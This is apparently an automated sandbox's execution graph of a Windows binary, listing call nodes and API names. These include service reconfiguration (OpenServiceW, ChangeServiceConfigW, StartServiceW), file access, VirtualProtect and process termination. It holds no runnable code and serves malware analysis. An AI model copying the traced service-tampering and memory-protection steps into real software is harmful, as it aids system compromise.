                                                                                                                                                                                                                              execution_graph 108536 ae520c 108539 b0cbd0 108536->108539 108538 ae5211 108557 b0be50 _wcslen 108539->108557 108540 b0c168 108578 b0a905 LocalFree 108540->108578 108543 b0bffd StrStrIW 108543->108557 108544 b0c78e CloseServiceHandle 108544->108557 108545 b0c706 StrStrIW 108545->108557 108546 b0c72b StrStrIW 108546->108557 108548 b0bf68 StrStrIW 108548->108557 108549 b0c399 StrStrIW 108554 b0c3a9 108549->108554 108549->108557 108550 b0bf7e 108553 b0c7e4 StartServiceW 108550->108553 108555 b0c36b OpenServiceW 108550->108555 108552 b0c0fd CloseServiceHandle 108552->108557 108553->108557 108554->108538 108555->108557 108556 b0c65a ChangeServiceConfigW 108556->108557 108558 b0bfe9 108556->108558 108557->108538 108557->108539 108557->108540 108557->108543 108557->108544 108557->108545 108557->108546 108557->108548 108557->108549 108557->108550 108557->108552 108557->108553 108557->108556 108557->108558 108559 aece90 108557->108559 108577 b0a350 CloseServiceHandle 108557->108577 108579 ae5d20 108557->108579 108558->108538 108570 aecc9b _wcslen 108559->108570 108560 aed426 108563 aed8a1 CloseHandle 108560->108563 108564 aed42a CloseHandle 108560->108564 108561 aed5c5 CreateFileW 108561->108570 108562 aed729 GetFileSizeEx 108562->108563 108562->108570 108563->108570 108564->108570 108566 aecd5c lstrcmpiW 108566->108570 108567 aecca0 lstrcmpiW 108567->108570 108569 aed049 SetFilePointerEx 108569->108570 108570->108557 108570->108559 108570->108560 108570->108561 108570->108562 108570->108563 108570->108564 108570->108566 108570->108567 108570->108569 108571 aed903 108570->108571 108572 aed378 CloseHandle 108570->108572 108573 aecc92 108570->108573 108574 ae5d20 VirtualAlloc VirtualFree 108570->108574 108575 aecfbb GetFileTime 108570->108575 108584 ae8937 VirtualAlloc VirtualFree 108570->108584 108585 ae8470 VirtualAlloc VirtualFree 108570->108585 108571->108573 108576 b1fdfc 40 API calls 108571->108576 108572->108570 108573->108557 108574->108570 108575->108570 108576->108571 108577->108557 108578->108558 108580 ae5d22 108579->108580 108580->108557 108581 ae5d39 VirtualAlloc 108580->108581 108583 ae5d46 VirtualFree 108580->108583 108581->108580 108583->108557 108584->108570 108585->108570 108586 43fe27 108599 41f944 108586->108599 108588 43fe3d 108589 43fe53 108588->108589 108592 43febe 108588->108592 108688 409e5d 60 API calls 108589->108688 108591 43fe92 108593 44089c 108591->108593 108594 43fe9a 108591->108594 108608 40fce0 108592->108608 108690 469e4a 89 API calls 4 library calls 108593->108690 108689 46834f 59 API calls Mailbox 108594->108689 108598 43feb2 Mailbox 108600 41f950 108599->108600 108601 41f962 108599->108601 108691 409d3c 60 API calls Mailbox 108600->108691 108602 41f991 108601->108602 108603 41f968 108601->108603 108702 409d3c 60 API calls Mailbox 108602->108702 108692 420db6 108603->108692 108607 41f95a 108607->108588 108731 408180 108608->108731 108610 40fd3d 108611 44472d 108610->108611 108672 4106f6 108610->108672 108736 40f234 108610->108736 108854 469e4a 89 API calls 4 library calls 108611->108854 108615 410545 _memmove 108644 420db6 Mailbox 59 API calls 108615->108644 108616 40fdd3 108616->108615 108617 40fe3e 108616->108617 108619 410517 108616->108619 108622 420db6 59 API calls Mailbox 108616->108622 108627 444742 108616->108627 108630 444755 108616->108630 108663 44480c 108616->108663 108828 409ea0 108616->108828 108629 40fe4c 108617->108629 108643 44488d 108617->108643 108858 4566ec 59 API calls 2 library calls 108617->108858 108618 444b53 108618->108627 108879 469e4a 89 API calls 4 library calls 108618->108879 108625 420db6 Mailbox 59 API calls 108619->108625 108622->108616 108625->108615 108626 444848 108859 4560ef 59 API calls 2 library calls 108626->108859 108628 4448f9 108636 444917 108628->108636 108862 4085c0 59 API calls Mailbox 108628->108862 108629->108618 108629->108628 108740 40837c 108629->108740 108642 4447d7 108630->108642 108855 40f6a3 341 API calls 108630->108855 108634 4448b2 Mailbox 108634->108629 108861 4566ec 59 API calls 2 library calls 108634->108861 108641 444928 108636->108641 108863 4085c0 59 API calls Mailbox 108636->108863 108637 40fea4 108647 444ad6 108637->108647 108648 40ff32 108637->108648 108682 410179 Mailbox _memmove 108637->108682 108638 44486b 108639 409ea0 341 API calls 108638->108639 108639->108643 108641->108682 108864 4560ab 59 API calls Mailbox 108641->108864 108642->108627 108856 469e4a 89 API calls 4 library calls 108642->108856 108643->108627 108643->108629 108860 47a2d9 85 API calls Mailbox 108643->108860 108686 410106 _memmove 108644->108686 108873 469ae7 60 API calls 108647->108873 108650 420db6 Mailbox 59 API calls 108648->108650 108652 40ff39 108650->108652 108652->108672 108747 4109d0 108652->108747 108654 444a4d 108655 409ea0 341 API calls 108654->108655 108657 444a87 108655->108657 108657->108627 108868 4084c0 108657->108868 108659 40ffb2 108659->108615 108666 40ffe6 108659->108666 108659->108672 108857 469e4a 89 API calls 4 library calls 108663->108857 108665 444ab2 108872 469e4a 89 API calls 4 library calls 108665->108872 108674 410007 108666->108674 108874 408047 108666->108874 108668 420db6 59 API calls Mailbox 108668->108682 108853 469e4a 89 API calls 4 library calls 108672->108853 108673 410398 108673->108598 108674->108672 108675 444b24 108674->108675 108677 41004c 108674->108677 108878 409d3c 60 API calls Mailbox 108675->108878 108677->108618 108677->108672 108678 4100d8 108677->108678 108824 409d3c 60 API calls Mailbox 108678->108824 108680 444a1c 108683 420db6 Mailbox 59 API calls 108680->108683 108681 4100eb 108681->108672 108825 4082df 59 API calls Mailbox 108681->108825 108682->108654 108682->108665 108682->108668 108682->108672 108682->108673 108682->108680 108826 408740 68 API calls __cinit 108682->108826 108827 408660 68 API calls 108682->108827 108865 465937 68 API calls 108682->108865 108866 4089b3 69 API calls Mailbox 108682->108866 108867 409d3c 60 API calls Mailbox 108682->108867 108683->108654 108686->108682 108687 410162 108686->108687 108852 409c90 59 API calls Mailbox 108686->108852 108687->108598 108688->108591 108689->108598 108690->108598 108691->108607 108694 420dbe 108692->108694 108695 420dd8 108694->108695 108697 420ddc std::exception::exception 108694->108697 108703 42571c 108694->108703 108720 4233a1 DecodePointer 108694->108720 108695->108607 108721 42859b RaiseException 108697->108721 108699 420e06 108722 4284d1 58 API calls _free 108699->108722 108701 420e18 108701->108607 108702->108607 108704 425797 108703->108704 108717 425728 108703->108717 108729 4233a1 DecodePointer 108704->108729 108706 42579d 108730 428b28 58 API calls __getptd_noexit 108706->108730 108709 42575b RtlAllocateHeap 108709->108717 108719 42578f 108709->108719 108711 425783 108727 428b28 58 API calls __getptd_noexit 108711->108727 108715 425781 108728 428b28 58 API calls __getptd_noexit 108715->108728 108716 425733 108716->108717 108723 42a16b 58 API calls __NMSG_WRITE 108716->108723 108724 42a1c8 58 API calls 6 library calls 108716->108724 108725 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108716->108725 108717->108709 108717->108711 108717->108715 108717->108716 108726 4233a1 DecodePointer 108717->108726 108719->108694 108720->108694 108721->108699 108722->108701 108723->108716 108724->108716 108726->108717 108727->108715 108728->108719 108729->108706 108730->108719 108732 40818f 108731->108732 108735 4081aa 108731->108735 108880 407e4f 108732->108880 108734 408197 CharUpperBuffW 108734->108735 108735->108610 108737 40f251 108736->108737 108738 40f272 108737->108738 108884 469e4a 89 API calls 4 library calls 108737->108884 108738->108616 108741 40838d 108740->108741 108742 43edbd 108740->108742 108743 420db6 Mailbox 59 API calls 108741->108743 108744 408394 108743->108744 108745 4083b5 108744->108745 108885 408634 59 API calls Mailbox 108744->108885 108745->108628 108745->108637 108748 444cc3 108747->108748 108759 4109f5 108747->108759 108948 469e4a 89 API calls 4 library calls 108748->108948 108750 410cfa 108750->108659 108752 410ee4 108752->108750 108754 410ef1 108752->108754 108946 411093 341 API calls Mailbox 108754->108946 108755 410a4b PeekMessageW 108823 410a05 Mailbox 108755->108823 108757 410ef8 LockWindowUpdate DestroyWindow GetMessageW 108757->108750 108761 410f2a 108757->108761 108759->108823 108949 409e5d 60 API calls 108759->108949 108950 456349 341 API calls 108759->108950 108760 444e81 Sleep 108760->108823 108764 445c58 TranslateMessage DispatchMessageW GetMessageW 108761->108764 108762 410ce4 108762->108750 108945 411070 10 API calls Mailbox 108762->108945 108764->108764 108765 445c88 108764->108765 108765->108750 108766 410e43 PeekMessageW 108766->108823 108767 410ea5 TranslateMessage DispatchMessageW 108767->108766 108768 444d50 TranslateAcceleratorW 108768->108766 108768->108823 108769 410d13 timeGetTime 108769->108823 108770 44581f WaitForSingleObject 108772 44583c GetExitCodeProcess CloseHandle 108770->108772 108770->108823 108806 410f95 108772->108806 108773 410e5f Sleep 108809 410e70 Mailbox 108773->108809 108774 408047 59 API calls 108774->108823 108776 445af8 Sleep 108776->108809 108778 420db6 59 API calls Mailbox 108778->108823 108780 42049f timeGetTime 108780->108809 108781 410f4e timeGetTime 108947 409e5d 60 API calls 108781->108947 108784 445b8f GetExitCodeProcess 108788 445ba5 WaitForSingleObject 108784->108788 108789 445bbb CloseHandle 108784->108789 108786 485f25 110 API calls 108786->108809 108787 40b7dd 109 API calls 108787->108809 108788->108789 108788->108823 108789->108809 108791 40b73c 314 API calls 108791->108823 108793 445874 108793->108806 108794 409e5d 60 API calls 108794->108823 108795 445078 Sleep 108795->108823 108796 445c17 Sleep 108796->108823 108804 40fce0 314 API calls 108804->108823 108806->108659 108808 407de1 59 API calls 108808->108823 108809->108780 108809->108784 108809->108786 108809->108787 108809->108793 108809->108795 108809->108796 108809->108806 108809->108823 108975 407667 108809->108975 108980 462408 60 API calls 108809->108980 108981 409e5d 60 API calls 108809->108981 108982 407de1 108809->108982 108986 4089b3 69 API calls Mailbox 108809->108986 108987 40b73c 341 API calls 108809->108987 108988 4564da 60 API calls 108809->108988 108989 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108809->108989 108990 463c55 66 API calls Mailbox 108809->108990 108811 469e4a 89 API calls 108811->108823 108812 409c90 59 API calls Mailbox 108812->108823 108813 409ea0 314 API calls 108813->108823 108814 4084c0 69 API calls 108814->108823 108816 45617e 59 API calls Mailbox 108816->108823 108817 4089b3 69 API calls 108817->108823 108818 4455d5 VariantClear 108818->108823 108819 44566b VariantClear 108819->108823 108820 445419 VariantClear 108820->108823 108821 408cd4 59 API calls Mailbox 108821->108823 108822 456e8f 59 API calls 108822->108823 108823->108755 108823->108760 108823->108762 108823->108766 108823->108767 108823->108768 108823->108769 108823->108770 108823->108773 108823->108774 108823->108776 108823->108778 108823->108781 108823->108791 108823->108794 108823->108804 108823->108806 108823->108808 108823->108809 108823->108811 108823->108812 108823->108813 108823->108814 108823->108816 108823->108817 108823->108818 108823->108819 108823->108820 108823->108821 108823->108822 108886 40e420 108823->108886 108893 40e6a0 108823->108893 108924 40f460 108823->108924 108944 4031ce IsDialogMessageW GetClassLongW 108823->108944 108951 486018 59 API calls 108823->108951 108952 469a15 59 API calls Mailbox 108823->108952 108953 45d4f2 59 API calls 108823->108953 108954 409837 108823->108954 108972 4560ef 59 API calls 2 library calls 108823->108972 108973 408401 59 API calls 108823->108973 108974 4082df 59 API calls Mailbox 108823->108974 108824->108681 108825->108686 108826->108682 108827->108682 108829 409ebf 108828->108829 108842 409eed Mailbox 108828->108842 108831 420db6 Mailbox 59 API calls 108829->108831 108830 422d40 67 API calls __cinit 108830->108842 108831->108842 108832 40b475 108833 408047 59 API calls 108832->108833 108844 40a057 108833->108844 108834 40b47a 108836 4409e5 108834->108836 108837 440055 108834->108837 108835 456e8f 59 API calls 108835->108842 110371 469e4a 89 API calls 4 library calls 108836->110371 110368 469e4a 89 API calls 4 library calls 108837->110368 108838 407667 59 API calls 108838->108842 108840 420db6 59 API calls Mailbox 108840->108842 108842->108830 108842->108832 108842->108834 108842->108835 108842->108837 108842->108838 108842->108840 108842->108844 108848 408047 59 API calls 108842->108848 108849 4409d6 108842->108849 108851 40a55a 108842->108851 110366 40c8c0 341 API calls 2 library calls 108842->110366 110367 40b900 60 API calls Mailbox 108842->110367 108844->108616 108845 440064 108845->108616 108848->108842 110370 469e4a 89 API calls 4 library calls 108849->110370 110369 469e4a 89 API calls 4 library calls 108851->110369 108852->108686 108853->108611 108854->108627 108855->108642 108856->108627 108857->108627 108858->108626 108859->108638 108860->108634 108861->108634 108862->108636 108863->108641 108864->108682 108865->108682 108866->108682 108867->108682 108869 4084cb 108868->108869 108871 4084f2 108869->108871 110372 4089b3 69 API calls Mailbox 108869->110372 108871->108665 108872->108627 108873->108666 108875 408052 108874->108875 108876 40805a 108874->108876 108877 407f77 59 API calls 108875->108877 108876->108674 108877->108876 108878->108618 108879->108627 108881 407e62 108880->108881 108883 407e5f _memmove 108880->108883 108882 420db6 Mailbox 59 API calls 108881->108882 108882->108883 108883->108734 108884->108738 108885->108745 108887 40e451 108886->108887 108888 40e43d 108886->108888 108992 469e4a 89 API calls 4 library calls 108887->108992 108991 40df00 341 API calls 2 library calls 108888->108991 108890 40e448 108890->108823 108892 443aa4 108892->108892 108894 40e6d5 108893->108894 108895 443aa9 108894->108895 108898 40e73f 108894->108898 108908 40e799 108894->108908 108896 409ea0 341 API calls 108895->108896 108897 443abe 108896->108897 108910 40e970 Mailbox 108897->108910 108997 469e4a 89 API calls 4 library calls 108897->108997 108901 407667 59 API calls 108898->108901 108898->108908 108899 407667 59 API calls 108899->108908 108902 443b04 108901->108902 108998 422d40 108902->108998 108903 422d40 __cinit 67 API calls 108903->108908 108905 443b26 108905->108823 108906 469e4a 89 API calls 108906->108910 108907 4084c0 69 API calls 108907->108910 108908->108899 108908->108903 108908->108905 108909 40e95a 108908->108909 108908->108910 108909->108910 109001 469e4a 89 API calls 4 library calls 108909->109001 108910->108906 108910->108907 108913 409ea0 341 API calls 108910->108913 108917 408d40 59 API calls 108910->108917 108919 40f195 108910->108919 108923 40ea78 108910->108923 108993 407f77 108910->108993 109002 456e8f 59 API calls 108910->109002 109003 47c5c3 341 API calls 108910->109003 109004 47b53c 341 API calls Mailbox 108910->109004 109006 409c90 59 API calls Mailbox 108910->109006 109007 4793c6 341 API calls Mailbox 108910->109007 108913->108910 108917->108910 109005 469e4a 89 API calls 4 library calls 108919->109005 108922 443e25 108922->108823 108923->108823 108925 40f650 108924->108925 108926 40f4ba 108924->108926 108929 407de1 59 API calls 108925->108929 108927 40f4c6 108926->108927 108928 44441e 108926->108928 109187 40f290 341 API calls 2 library calls 108927->109187 109189 47bc6b 108928->109189 108935 40f58c Mailbox 108929->108935 108932 44442c 108936 40f630 108932->108936 109229 469e4a 89 API calls 4 library calls 108932->109229 108934 40f4fd 108934->108932 108934->108935 108934->108936 108938 40f5e3 108935->108938 109086 47df37 108935->109086 109089 463c37 108935->109089 109092 47445a 108935->109092 109101 46cb7a 108935->109101 109181 404e4a 108935->109181 108936->108823 108938->108936 109188 409c90 59 API calls Mailbox 108938->109188 108944->108823 108945->108752 108946->108757 108947->108823 108948->108759 108949->108759 108950->108759 108951->108823 108952->108823 108953->108823 108955 409851 108954->108955 108963 40984b 108954->108963 108956 43f5d3 __i64tow 108955->108956 108957 43f4da 108955->108957 108958 409899 108955->108958 108960 409857 __itow 108955->108960 108965 420db6 Mailbox 59 API calls 108957->108965 108970 43f552 Mailbox _wcscpy 108957->108970 110364 423698 83 API calls 3 library calls 108958->110364 108962 420db6 Mailbox 59 API calls 108960->108962 108964 409871 108962->108964 108963->108823 108964->108963 108966 407de1 59 API calls 108964->108966 108967 43f51f 108965->108967 108966->108963 108968 420db6 Mailbox 59 API calls 108967->108968 108969 43f545 108968->108969 108969->108970 108971 407de1 59 API calls 108969->108971 110365 423698 83 API calls 3 library calls 108970->110365 108971->108970 108972->108823 108973->108823 108974->108823 108976 420db6 Mailbox 59 API calls 108975->108976 108977 407688 108976->108977 108978 420db6 Mailbox 59 API calls 108977->108978 108979 407696 108978->108979 108979->108809 108980->108809 108981->108809 108983 407df0 __wsetenvp _memmove 108982->108983 108984 420db6 Mailbox 59 API calls 108983->108984 108985 407e2e 108984->108985 108985->108809 108986->108809 108987->108809 108988->108809 108989->108809 108990->108809 108991->108890 108992->108892 108994 407f9a _memmove 108993->108994 108995 407f87 108993->108995 108994->108910 108995->108994 108996 420db6 Mailbox 59 API calls 108995->108996 108996->108994 108997->108910 109008 422c44 108998->109008 109000 422d4b 109000->108908 109001->108910 109002->108910 109003->108910 109004->108910 109005->108922 109006->108910 109007->108910 109009 422c50 __wfsopen 109008->109009 109016 423217 109009->109016 109015 422c77 __wfsopen 109015->109000 109033 429c0b 109016->109033 109018 422c59 109019 422c88 DecodePointer DecodePointer 109018->109019 109020 422c65 109019->109020 109021 422cb5 109019->109021 109030 422c82 109020->109030 109021->109020 109079 4287a4 59 API calls __wfsopen 109021->109079 109023 422d18 EncodePointer EncodePointer 109023->109020 109024 422cec 109024->109020 109028 422d06 EncodePointer 109024->109028 109081 428864 61 API calls 2 library calls 109024->109081 109025 422cc7 109025->109023 109025->109024 109080 428864 61 API calls 2 library calls 109025->109080 109028->109023 109029 422d00 109029->109020 109029->109028 109082 423220 109030->109082 109034 429c2f EnterCriticalSection 109033->109034 109035 429c1c 109033->109035 109034->109018 109040 429c93 109035->109040 109037 429c22 109037->109034 109064 4230b5 58 API calls 3 library calls 109037->109064 109041 429c9f __wfsopen 109040->109041 109042 429cc0 109041->109042 109043 429ca8 109041->109043 109052 429ce1 __wfsopen 109042->109052 109068 42881d 58 API calls 2 library calls 109042->109068 109065 42a16b 58 API calls __NMSG_WRITE 109043->109065 109045 429cad 109066 42a1c8 58 API calls 6 library calls 109045->109066 109048 429cd5 109050 429ceb 109048->109050 109051 429cdc 109048->109051 109049 429cb4 109067 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109049->109067 109055 429c0b __lock 58 API calls 109050->109055 109069 428b28 58 API calls __getptd_noexit 109051->109069 109052->109037 109057 429cf2 109055->109057 109058 429d17 109057->109058 109059 429cff 109057->109059 109071 422d55 109058->109071 109070 429e2b InitializeCriticalSectionAndSpinCount 109059->109070 109062 429d0b 109077 429d33 LeaveCriticalSection _doexit 109062->109077 109065->109045 109066->109049 109068->109048 109069->109052 109070->109062 109072 422d5e RtlFreeHeap 109071->109072 109076 422d87 __dosmaperr 109071->109076 109073 422d73 109072->109073 109072->109076 109078 428b28 58 API calls __getptd_noexit 109073->109078 109075 422d79 GetLastError 109075->109076 109076->109062 109077->109052 109078->109075 109079->109025 109080->109024 109081->109029 109085 429d75 LeaveCriticalSection 109082->109085 109084 422c87 109084->109015 109085->109084 109230 47cadd 109086->109230 109088 47df47 109088->108938 109362 46445a GetFileAttributesW 109089->109362 109093 409837 84 API calls 109092->109093 109094 474494 109093->109094 109366 406240 109094->109366 109096 4744a4 109097 4744c9 109096->109097 109098 409ea0 341 API calls 109096->109098 109100 4744cd 109097->109100 109391 409a98 109097->109391 109098->109097 109100->108938 109102 407667 59 API calls 109101->109102 109103 46cbaf 109102->109103 109104 407667 59 API calls 109103->109104 109105 46cbb8 109104->109105 109106 46cbcc 109105->109106 109636 409b3c 59 API calls 109105->109636 109108 409837 84 API calls 109106->109108 109109 46cbe9 109108->109109 109110 46ccea 109109->109110 109111 46cc0b 109109->109111 109116 46cd1a Mailbox 109109->109116 109440 404ddd 109110->109440 109112 409837 84 API calls 109111->109112 109114 46cc17 109112->109114 109117 408047 59 API calls 109114->109117 109116->108938 109120 46cc23 109117->109120 109118 46cd16 109118->109116 109119 407667 59 API calls 109118->109119 109122 46cd4b 109119->109122 109124 46cc37 109120->109124 109125 46cc69 109120->109125 109121 404ddd 136 API calls 109121->109118 109123 407667 59 API calls 109122->109123 109126 46cd54 109123->109126 109127 408047 59 API calls 109124->109127 109128 409837 84 API calls 109125->109128 109129 407667 59 API calls 109126->109129 109130 46cc47 109127->109130 109131 46cc76 109128->109131 109132 46cd5d 109129->109132 109637 407cab 109130->109637 109134 408047 59 API calls 109131->109134 109135 407667 59 API calls 109132->109135 109137 46cc82 109134->109137 109138 46cd66 109135->109138 109644 464a31 GetFileAttributesW 109137->109644 109141 409837 84 API calls 109138->109141 109139 409837 84 API calls 109143 46cc5d 109139->109143 109142 46cd73 109141->109142 109464 40459b 109142->109464 109146 407b2e 59 API calls 109143->109146 109144 46cc8b 109147 4079f2 59 API calls 109144->109147 109150 46cc9e 109144->109150 109146->109125 109147->109150 109149 409837 84 API calls 109152 46cccb 109149->109152 109150->109149 109156 46cca4 109150->109156 109645 4637ef 75 API calls Mailbox 109152->109645 109156->109116 109182 404e54 109181->109182 109184 404e5b 109181->109184 109183 4253a6 __fcloseall 83 API calls 109182->109183 109183->109184 109185 404e6a 109184->109185 109186 404e7b FreeLibrary 109184->109186 109185->108938 109186->109185 109187->108934 109188->108938 109190 47bc96 109189->109190 109191 47bcb0 109189->109191 110358 469e4a 89 API calls 4 library calls 109190->110358 110359 47a213 59 API calls Mailbox 109191->110359 109194 47bcbb 109195 409ea0 340 API calls 109194->109195 109196 47bd1c 109195->109196 109197 47bdae 109196->109197 109200 47bd5d 109196->109200 109212 47bca8 Mailbox 109196->109212 109198 47be04 109197->109198 109199 47bdb4 109197->109199 109201 409837 84 API calls 109198->109201 109198->109212 110361 46791a 59 API calls 109199->110361 110360 4672df 59 API calls Mailbox 109200->110360 109202 47be16 109201->109202 109206 407e4f 59 API calls 109202->109206 109204 47bdd7 109207 405d41 59 API calls 109204->109207 109209 47be3a CharUpperBuffW 109206->109209 109210 47bddf Mailbox 109207->109210 109208 47bd8d 109211 40f460 340 API calls 109208->109211 109213 47be54 109209->109213 109216 40fce0 340 API calls 109210->109216 109211->109212 109212->108932 109214 47bea7 109213->109214 109215 47be5b 109213->109215 109217 409837 84 API calls 109214->109217 110362 4672df 59 API calls Mailbox 109215->110362 109216->109212 109218 47beaf 109217->109218 110363 409e5d 60 API calls 109218->110363 109221 47be89 109223 40f460 340 API calls 109221->109223 109222 47beb9 109222->109212 109224 409837 84 API calls 109222->109224 109223->109212 109225 47bed4 109224->109225 109226 405d41 59 API calls 109225->109226 109227 47bee4 109226->109227 109228 40fce0 340 API calls 109227->109228 109228->109212 109229->108936 109231 409837 84 API calls 109230->109231 109232 47cb1a 109231->109232 109255 47cb61 Mailbox 109232->109255 109268 47d7a5 109232->109268 109234 47cdb9 109235 47cf2e 109234->109235 109240 47cdc7 109234->109240 109318 47d8c8 92 API calls Mailbox 109235->109318 109238 47cf3d 109238->109240 109241 47cf49 109238->109241 109239 409837 84 API calls 109258 47cbb2 Mailbox 109239->109258 109281 47c96e 109240->109281 109241->109255 109246 47ce00 109296 420c08 109246->109296 109249 47ce33 109303 4092ce 109249->109303 109250 47ce1a 109302 469e4a 89 API calls 4 library calls 109250->109302 109253 47ce25 GetCurrentProcess TerminateProcess 109253->109249 109255->109088 109258->109234 109258->109239 109258->109255 109300 47fbce 59 API calls 2 library calls 109258->109300 109301 47cfdf 61 API calls 2 library calls 109258->109301 109259 47cfa4 109259->109255 109264 47cfb8 FreeLibrary 109259->109264 109261 47ce6b 109315 47d649 107 API calls _free 109261->109315 109264->109255 109267 47ce7c 109267->109259 109316 408d40 59 API calls Mailbox 109267->109316 109317 409d3c 60 API calls Mailbox 109267->109317 109319 47d649 107 API calls _free 109267->109319 109269 407e4f 59 API calls 109268->109269 109270 47d7c0 CharLowerBuffW 109269->109270 109320 45f167 109270->109320 109274 407667 59 API calls 109275 47d7f9 109274->109275 109327 40784b 109275->109327 109277 47d810 109340 407d2c 109277->109340 109279 47d81c Mailbox 109280 47d858 Mailbox 109279->109280 109344 47cfdf 61 API calls 2 library calls 109279->109344 109280->109258 109282 47c989 109281->109282 109283 47c9de 109281->109283 109284 420db6 Mailbox 59 API calls 109282->109284 109287 47da50 109283->109287 109286 47c9ab 109284->109286 109285 420db6 Mailbox 59 API calls 109285->109286 109286->109283 109286->109285 109288 47dc79 Mailbox 109287->109288 109295 47da73 _strcat _wcscpy __wsetenvp 109287->109295 109288->109246 109289 409b3c 59 API calls 109289->109295 109290 409be6 59 API calls 109290->109295 109291 409b98 59 API calls 109291->109295 109292 409837 84 API calls 109292->109295 109293 42571c 58 API calls __malloc_crt 109293->109295 109295->109288 109295->109289 109295->109290 109295->109291 109295->109292 109295->109293 109351 465887 61 API calls 2 library calls 109295->109351 109299 420c1d 109296->109299 109297 420cb5 VirtualProtect 109298 420c83 109297->109298 109298->109249 109298->109250 109299->109297 109299->109298 109300->109258 109301->109258 109302->109253 109304 4092d6 109303->109304 109305 420db6 Mailbox 59 API calls 109304->109305 109306 4092e4 109305->109306 109307 4092f0 109306->109307 109352 4091fc 59 API calls Mailbox 109306->109352 109309 409050 109307->109309 109353 409160 109309->109353 109311 420db6 Mailbox 59 API calls 109313 4090fb 109311->109313 109312 40905f 109312->109311 109312->109313 109313->109267 109314 408d40 59 API calls Mailbox 109313->109314 109314->109261 109315->109267 109316->109267 109317->109267 109318->109238 109319->109267 109321 45f192 __wsetenvp 109320->109321 109322 45f278 109321->109322 109323 45f1c7 109321->109323 109326 45f1d1 109321->109326 109322->109326 109346 4078c4 61 API calls 109322->109346 109323->109326 109345 4078c4 61 API calls 109323->109345 109326->109274 109326->109279 109328 4078b7 109327->109328 109329 40785a 109327->109329 109330 407d2c 59 API calls 109328->109330 109329->109328 109331 407865 109329->109331 109337 407888 _memmove 109330->109337 109332 407880 109331->109332 109333 43eb09 109331->109333 109347 407f27 59 API calls Mailbox 109332->109347 109348 408029 109333->109348 109336 43eb13 109338 420db6 Mailbox 59 API calls 109336->109338 109337->109277 109339 43eb33 109338->109339 109341 407d3a 109340->109341 109343 407d43 _memmove 109340->109343 109342 407e4f 59 API calls 109341->109342 109341->109343 109342->109343 109343->109279 109344->109280 109345->109323 109346->109322 109347->109337 109349 420db6 Mailbox 59 API calls 109348->109349 109350 408033 109349->109350 109350->109336 109351->109295 109352->109307 109354 409169 Mailbox 109353->109354 109355 43f19f 109354->109355 109360 409173 109354->109360 109356 420db6 Mailbox 59 API calls 109355->109356 109358 43f1ab 109356->109358 109357 40917a 109357->109312 109360->109357 109361 409c90 59 API calls Mailbox 109360->109361 109361->109360 109363 463c3e 109362->109363 109364 464475 FindFirstFileW 109362->109364 109363->108938 109364->109363 109365 46448a FindClose 109364->109365 109365->109363 109404 407a16 109366->109404 109368 40646a 109414 40750f 109368->109414 109370 406484 Mailbox 109370->109096 109373 43dff6 109424 45f8aa 91 API calls 4 library calls 109373->109424 109374 407d8c 59 API calls 109385 406265 109374->109385 109375 40750f 59 API calls 109375->109385 109379 43e004 109380 40750f 59 API calls 109379->109380 109381 43e01a 109380->109381 109381->109370 109382 406799 _memmove 109425 45f8aa 91 API calls 4 library calls 109382->109425 109383 43df92 109384 408029 59 API calls 109383->109384 109386 43df9d 109384->109386 109385->109368 109385->109373 109385->109374 109385->109375 109385->109382 109385->109383 109388 407e4f 59 API calls 109385->109388 109409 405d41 109385->109409 109413 405f6c 60 API calls 109385->109413 109422 405e72 60 API calls 109385->109422 109423 407924 59 API calls 2 library calls 109385->109423 109390 420db6 Mailbox 59 API calls 109386->109390 109389 40643b CharUpperBuffW 109388->109389 109389->109385 109390->109382 109392 43f7d6 109391->109392 109393 409aa8 109391->109393 109394 43f7e7 109392->109394 109426 407bcc 109392->109426 109398 420db6 Mailbox 59 API calls 109393->109398 109435 407d8c 109394->109435 109397 43f7f1 109401 409ad4 109397->109401 109402 407667 59 API calls 109397->109402 109399 409abb 109398->109399 109399->109397 109400 409ac6 109399->109400 109400->109401 109403 407de1 59 API calls 109400->109403 109401->109100 109402->109401 109403->109401 109405 420db6 Mailbox 59 API calls 109404->109405 109406 407a3b 109405->109406 109407 408029 59 API calls 109406->109407 109408 407a4a 109407->109408 109408->109385 109410 405d51 109409->109410 109411 420db6 Mailbox 59 API calls 109410->109411 109412 405d64 109411->109412 109412->109385 109413->109385 109415 4075af 109414->109415 109419 407522 _memmove 109414->109419 109417 420db6 Mailbox 59 API calls 109415->109417 109416 420db6 Mailbox 59 API calls 109418 407529 109416->109418 109417->109419 109420 420db6 Mailbox 59 API calls 109418->109420 109421 407552 109418->109421 109419->109416 109420->109421 109421->109370 109422->109385 109423->109385 109424->109379 109425->109370 109427 407c45 109426->109427 109428 407bd8 __wsetenvp 109426->109428 109429 407d2c 59 API calls 109427->109429 109430 407c13 109428->109430 109431 407bee 109428->109431 109434 407bf6 _memmove 109429->109434 109433 408029 59 API calls 109430->109433 109439 407f27 59 API calls Mailbox 109431->109439 109433->109434 109434->109394 109436 407da6 109435->109436 109437 407d99 109435->109437 109438 420db6 Mailbox 59 API calls 109436->109438 109437->109397 109438->109437 109439->109434 109646 404bb5 109440->109646 109445 43d8e6 109448 404e4a 84 API calls 109445->109448 109446 404e08 LoadLibraryExW 109656 404b6a 109446->109656 109450 43d8ed 109448->109450 109452 404b6a 3 API calls 109450->109452 109454 43d8f5 109452->109454 109453 404e2f 109453->109454 109455 404e3b 109453->109455 109682 404f0b 109454->109682 109457 404e4a 84 API calls 109455->109457 109459 404e40 109457->109459 109459->109118 109459->109121 109461 43d91c 109690 404ec7 109461->109690 109465 407667 59 API calls 109464->109465 109466 4045b1 109465->109466 109467 407667 59 API calls 109466->109467 109468 4045b9 109467->109468 109469 407667 59 API calls 109468->109469 109470 4045c1 109469->109470 109471 407667 59 API calls 109470->109471 109472 4045c9 109471->109472 109473 43d4d2 109472->109473 109474 4045fd 109472->109474 109475 408047 59 API calls 109473->109475 109476 40784b 59 API calls 109474->109476 109477 43d4db 109475->109477 109478 40460b 109476->109478 109636->109106 109638 43ed4a 109637->109638 109639 407cbf 109637->109639 109641 408029 59 API calls 109638->109641 110353 407c50 109639->110353 109643 43ed55 __wsetenvp _memmove 109641->109643 109642 407cca 109642->109139 109644->109144 109645->109156 109695 404c03 109646->109695 109649 404bdc 109650 404bf5 109649->109650 109651 404bec FreeLibrary 109649->109651 109653 42525b 109650->109653 109651->109650 